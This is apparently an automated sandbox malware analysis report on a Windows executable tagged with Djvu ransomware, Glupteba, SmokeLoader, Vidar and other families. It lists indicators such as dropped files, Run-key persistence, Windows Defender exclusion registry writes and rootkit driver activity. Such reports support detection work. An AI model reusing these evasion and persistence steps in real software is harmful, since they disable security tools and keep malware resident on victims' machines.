Malware Analysis Report

2024-11-13 14:05

Sample ID 240225-2pwwdafb4x
Target 0b31dc8d9eeaa4a6803873a6c1380c72.exe
SHA256 7c94ffaf6d76f18ce6bfc6039f9252a4b71d79e483d822aeab0de9b3189b6d0e
Tags
dcrat djvu glupteba smokeloader vidar zgrat 7f6c51bbce50f99b5a632c204a5ec558 tfd5 backdoor discovery dropper evasion infostealer loader persistence ransomware rat rootkit stealer trojan upx lumma rhadamanthys
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

SHA256

7c94ffaf6d76f18ce6bfc6039f9252a4b71d79e483d822aeab0de9b3189b6d0e

Threat Level: Known bad

The file 0b31dc8d9eeaa4a6803873a6c1380c72.exe was found to be: Known bad.

Malicious Activity Summary

dcrat djvu glupteba smokeloader vidar zgrat 7f6c51bbce50f99b5a632c204a5ec558 tfd5 backdoor discovery dropper evasion infostealer loader persistence ransomware rat rootkit stealer trojan upx lumma rhadamanthys

Glupteba

Detect Vidar Stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

SmokeLoader

DcRat

Detected Djvu ransomware

Rhadamanthys

Detect ZGRat V1

Djvu Ransomware

Glupteba payload

Vidar

Lumma Stealer

Windows security bypass

ZGRat

Modifies boot configuration data using bcdedit

Drops file in Drivers directory

Modifies Windows Firewall

Disables Task Manager via registry modification

Downloads MZ/PE file

Possible attempt to disable PatchGuard

UPX packed file

Executes dropped EXE

Modifies file permissions

Checks computer location settings

Loads dropped DLL

Windows security modification

Deletes itself

Manipulates WinMonFS driver

Checks installed software on the system

Looks up external IP address via web service

Manipulates WinMon driver

Adds Run key to start application

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Runs ping.exe

Uses Task Scheduler COM API

Modifies registry key

Creates scheduled task(s)

Checks SCSI registry key(s)

Modifies system certificate store

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Modifies registry class

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-25 22:45

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-25 22:45

Reported

2024-02-25 22:48

Platform

win7-20240215-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\1cf4e57f-32c3-4019-88f0-dbc6891395db\\84BB.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\C851.exe = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A

ZGRat

rat zgrat

Disables Task Manager via registry modification

evasion

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B8D6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DE51.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EDE2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2F75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\34C3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\containerProviderhost\runtimenetSvc.exe N/A
N/A N/A C:\containerProviderhost\services.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\C851.exe = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\1cf4e57f-32c3-4019-88f0-dbc6891395db\\84BB.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Manipulates WinMon driver

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\C851.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\dwm.exe C:\containerProviderhost\runtimenetSvc.exe N/A
File created C:\Program Files (x86)\Windows Defender\de-DE\6cb0b6c459d5d3 C:\containerProviderhost\runtimenetSvc.exe N/A
File created C:\Program Files (x86)\Windows Defender\de-DE\dwm.exe C:\containerProviderhost\runtimenetSvc.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
File created C:\Windows\Logs\CBS\CbsPersist_20240225224649.cab C:\Windows\system32\makecab.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\Speech\Common\en-US\cmd.exe C:\containerProviderhost\runtimenetSvc.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-382 = "South Africa Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-291 = "Central European Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-105 = "Central Brazilian Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-161 = "Central Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-432 = "Iran Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-242 = "Samoa Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-262 = "GMT Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-232 = "Hawaiian Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-551 = "North Asia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" C:\Windows\windefender.exe N/A
